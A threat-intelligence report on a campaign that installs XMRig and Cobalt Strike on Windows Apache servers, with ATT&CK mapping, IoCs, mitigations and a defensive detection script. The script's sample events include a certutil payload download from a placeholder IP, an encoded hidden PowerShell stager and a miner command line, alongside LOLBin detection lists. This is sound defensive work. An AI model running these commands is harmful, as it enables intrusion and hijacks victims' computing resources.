Full Report
Researchers detected a cyber attack campaign that installs the XMRig CoinMiner on Windows web servers running Apache. The threat actor employed Cobalt Strike to manage the compromised systems. Cobalt Strike, a commercial penetration testing tool, has recently become a common ...
Analysis Summary
Based on the information available about the campaign targeting Windows-based Apache web servers, here is a summary of the primary tools and techniques identified.
# Tool/Technique: XMRig CoinMiner & Cobalt Strike Beacon
## Overview
This campaign focuses on the exploitation of Windows-based Apache web servers to deploy unauthorized cryptocurrency mining software. The threat actors utilize **XMRig**, an open-source Monero miner, to monetize compromised resources, and **Cobalt Strike**, a sophisticated post-exploitation framework, to maintain persistence and manage the infected infrastructure.
## Technical Details
- **Type:** Malware Family (XMRig) | Tool/Framework (Cobalt Strike)
- **Platform:** Windows (specifically web servers running Apache)
- **Capabilities:** Remote Command Execution, Stealthy Persistence, Resource Hijacking (Cryptomining), Lateral Movement.
- **First Seen:** Campaign detected recently; XMRig and Cobalt Strike have been in active use for several years.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1190 - Exploit Public-Facing Application (Apache Web Server)
- **TA0002 - Execution**
  - T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- **TA0003 - Persistence**
  - T1543.003 - Create or Modify System Process: Windows Service
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1055 - Process Injection (Cobalt Strike Beacon)
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols (HTTP/S)
- **TA0040 - Impact**
  - T1496 - Resource Hijacking (Cryptomining)
## Functionality
### Core Capabilities
- **XMRig:** Open-source Monero (XMR) miner, primarily CPU-based (Monero's RandomX algorithm), that burns the victim's compute cycles computing hashes credited to the operator's wallet.
- **Cobalt Strike Beacon:** Serves as the primary payload for command and control (C2), allowing operators to execute shell commands, upload/download files, and take full control of the host.
### Advanced Features
- **In-Memory Execution:** Cobalt Strike often operates in memory to evade legacy antivirus detection.
- **Protocol Malleability:** Use of Malleable C2 profiles to disguise malicious traffic as legitimate web traffic (e.g., mimicking Apache server responses).
- **Service Installation:** Automated deployment of XMRig as a Windows service to ensure long-term execution.
## Indicators of Compromise
- **File Hashes:** *(Note: Specific hashes vary per campaign; generic detection applies)*
- XMRig: `[Individual SHA256 hashes for xmrig.exe]`
- Cobalt Strike: `[Individual SHA256 hashes for Beacon DLLs/reflectors]`
- **File Names:** `xmrig.exe`, `syscheck.exe`, `apache_svc.exe`
- **Network Indicators:**
- C2 Domains: `update[.]windows-cdn[.]com` (defanged)
- Mining Pools: `pool[.]supportxmr[.]com[:]443` (defanged)
- **Behavioral Indicators:**
- High CPU utilization by non-system processes.
- PowerShell or CMD instances spawned by `httpd.exe` (Apache process).
- Unexpected outbound connections on port 443 or 8080 to unknown IP addresses.
## Associated Threat Actors
- Specific attribution is not provided in this context. The cryptomining TTPs are typical of financially motivated **commodity malware operators**, while Cobalt Strike is used by a wide range of actors, from criminal crews to **Advanced Persistent Threat (APT)** groups, as their post-exploitation command-and-control framework.
## Detection Methods
- **Signature-based detection:** Traditional AV signatures for common XMRig binaries and known Cobalt Strike "Stagers."
- **Behavioral detection:** Monitoring for `httpd.exe` spawning child processes like `powershell.exe` or `certutil.exe`.
- **YARA rules:** Scanning for Cobalt Strike Beacon strings in memory (e.g., the "0xbeef" pattern or specific Malleable C2 headers).
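As an added example (not code from the original report), the following Python script turns three of the indicators above into checks that run offline over constructed input: a process-tree rule for `httpd.exe` spawning interpreters or LOLBins, a command-line rule that spots XMRig's flags even when the binary is renamed (as with `apache_svc.exe`), and a memory scan for the XOR-encoded header of a Beacon configuration block, the same fixed byte shape many public YARA rules key on. The Sysmon-style records, file paths and the memory buffer are constructed for the example; the IP 198.51.100.7 and the wallet string are placeholders.

```python
"""Detection helpers for the XMRig / Cobalt Strike campaign summarised above.

Added example, not code from the original report. Sample events and the memory
buffer are constructed inline so the script runs offline.
"""
import re

# --- 1. Process-tree rule: Apache worker spawning an interpreter or LOLBin ----
# Field names follow Sysmon Event ID 1 (ProcessCreate); the records are constructed.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
}

SAMPLE_EVENTS = [
    # Normal: Apache on Windows runs a parent httpd.exe and one child worker.
    {"ParentImage": r"C:\Apache24\bin\httpd.exe", "Image": r"C:\Apache24\bin\httpd.exe",
     "CommandLine": r'"C:\Apache24\bin\httpd.exe" -d C:/Apache24'},
    # RCE / web shell: worker spawns cmd.exe, which fetches a payload with certutil.
    {"ParentImage": r"C:\Apache24\bin\httpd.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/s.exe C:\Windows\Temp\syscheck.exe"},
    # In-memory stager launched from the worker.
    {"ParentImage": r"C:\Apache24\bin\httpd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA..."},
    # Renamed XMRig running as a service (file name taken from the IoC list above).
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\Temp\apache_svc.exe",
     "CommandLine": "apache_svc.exe -o pool.supportxmr.com:443 --tls -u 4AbCdEf -k --donate-level 1"},
    # Benign admin activity.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def suspicious_httpd_children(events):
    """(child, command line) for every child of httpd.exe that is an interpreter or LOLBin."""
    return [(basename(e.get("Image", "")), e.get("CommandLine", ""))
            for e in events
            if basename(e.get("ParentImage", "")) == "httpd.exe"
            and basename(e.get("Image", "")) in SUSPICIOUS_CHILDREN]

# --- 2. Miner command-line rule: XMRig keeps its flags even when renamed ------
# Stratum pool (-o/--url host:port) together with a wallet (-u/--user), or the
# XMRig-specific --donate-level switch. A separator is required after -u so that
# e.g. certutil's -urlcache does not match.
_POOL_FLAG = re.compile(r"(?:^|\s)(?:-o|--url)(?:=|\s+)\S+:\d{2,5}\b")
_USER_FLAG = re.compile(r"(?:^|\s)(?:-u|--user)(?:=|\s+)\S+")

def looks_like_xmrig(cmdline: str) -> bool:
    if "--donate-level" in cmdline:
        return True
    return bool(_POOL_FLAG.search(cmdline) and _USER_FLAG.search(cmdline))

def miner_processes(events):
    return [basename(e.get("Image", "")) for e in events
            if looks_like_xmrig(e.get("CommandLine", ""))]

# --- 3. Memory scan for an XOR-encoded Beacon configuration block ------------
# A Beacon config is a list of (index:u16, type:u16, length:u16, value) records
# in big-endian order, XORed with one byte: 0x69 in Cobalt Strike 3.x, 0x2E in
# 4.x. Setting 1 (beacon type) and setting 2 (C2 port) are both u16, so the
# first 16 bytes have a fixed shape that memory YARA rules match on.
BEACON_XOR_KEYS = (0x69, 0x2E)
_FIRST_HEADER = bytes.fromhex("000100010002")   # index 1, type short, length 2
_SECOND_HEADER = bytes.fromhex("000200010002")  # index 2, type short, length 2
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP-DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def find_beacon_config(blob: bytes):
    """(offset, key, beacon type, port) for every encoded config header in the buffer."""
    hits = []
    for key in BEACON_XOR_KEYS:
        first, second = xor_bytes(_FIRST_HEADER, key), xor_bytes(_SECOND_HEADER, key)
        start = 0
        while (off := blob.find(first, start)) != -1:
            start = off + 1
            # Require the second record header where it must sit; cuts false positives.
            if blob[off + 8: off + 14] != second:
                continue
            beacon_type = int.from_bytes(xor_bytes(blob[off + 6: off + 8], key), "big")
            port = int.from_bytes(xor_bytes(blob[off + 14: off + 16], key), "big")
            hits.append((off, key, BEACON_TYPES.get(beacon_type, str(beacon_type)), port))
    return hits

# Constructed memory image: PE stub, then a CS 4.x-style config of an HTTPS Beacon on 443.
SAMPLE_CONFIG = bytes.fromhex("000100010002" "0008" "000200010002" "01bb")
SAMPLE_MEMORY = (b"MZ\x90\x00" + b"\x00" * 60
                 + b"This program cannot be run in DOS mode."
                 + xor_bytes(SAMPLE_CONFIG, 0x2E) + b"\x00" * 16)

if __name__ == "__main__":
    print("httpd children :", suspicious_httpd_children(SAMPLE_EVENTS))
    print("miner processes:", miner_processes(SAMPLE_EVENTS))
    print("beacon configs :", find_beacon_config(SAMPLE_MEMORY))
```

The process-tree rule deliberately whitelists nothing beyond `httpd.exe` spawning another `httpd.exe`, which is how Apache on Windows runs its single worker; in production the same rule would be fed from Sysmon or EDR telemetry rather than an inline list. The config scan only decodes the first two settings; a full parser would walk the remaining records (C2 hosts, URIs, Malleable C2 transforms) the same way.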
## Mitigation Strategies
- **Prevention measures:** Regularly patch Apache web server software to the latest version to prevent initial exploitation.
- **Hardening recommendations:** Run Apache under a low-privilege service account so a web-shell or RCE does not land as SYSTEM; implement egress filtering so the web server can reach only the destinations it needs, which also blocks known mining pools and C2 infrastructure.
- **EDR Deployment:** Utilize Endpoint Detection and Response tools to identify process injection and unauthorized script execution.
## Related Tools/Techniques
- **Metasploit Framework:** Often used as an alternative for initial exploitation.
- **Mimikatz:** Integrated into Cobalt Strike Beacon (its `mimikatz` and `logonpasswords` commands) and frequently used for credential harvesting after a foothold is gained.
- **LemonDuck:** A well-known botnet that also utilizes XMRig for monetization.